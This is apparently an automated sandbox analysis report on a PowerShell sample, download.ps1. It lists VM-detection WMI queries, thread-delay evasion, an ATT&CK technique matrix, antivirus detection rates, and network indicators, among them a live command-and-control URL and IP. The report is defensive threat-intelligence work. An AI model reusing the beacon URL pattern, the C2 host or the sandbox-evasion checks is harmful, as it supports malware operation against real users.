Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbCpJa source: powershell.exe, 00000000.00000002.1861814628.000001FE618F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000000.00000002.1861814628.000001FE6178B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B6CD2A5 pushad ; iretd 0_2_00007FFD9B6CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7E4FA5 push edi; ret 0_2_00007FFD9B7E4FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7E753F push ebx; iretd 0_2_00007FFD9B7E756A

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6085Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3792Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A8E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A8E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A1A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1861814628.000001FE618A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A8E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A8E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1861814628.000001FE618A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus`
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A1A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`S
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A8E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A1A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1861814628.000001FE618F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A8E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps111%VirustotalBrowse
download.ps15%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://0.google.com/0%Avira URL Cloudsafe
http://0.google.0%Avira URL Cloudsafe
http://$xf8o4gnevib316q/$17l8kfj5a4enoxz.php?id=$env:computername&key=$dzthxgyfaewj&s=5270%Avira URL Cloudsafe
http://kcehmenjdibnmni.top/g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=5270%Avira URL Cloudsafe
https://0.google.com/0%Avira URL Cloudsafe
https://0.google0%Avira URL Cloudsafe
http://kcehmenjdibnmni.top0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.185.68
truefalse
    		high
    kcehmenjdibnmni.top
    		45.61.136.138
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://kcehmenjdibnmni.top/g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527true
      • Avira URL Cloud: safe
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://crl.microsoftpowershell.exe, 00000000.00000002.1861632253.000001FE616A0000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1727138891.000001FE4AC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE5961F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
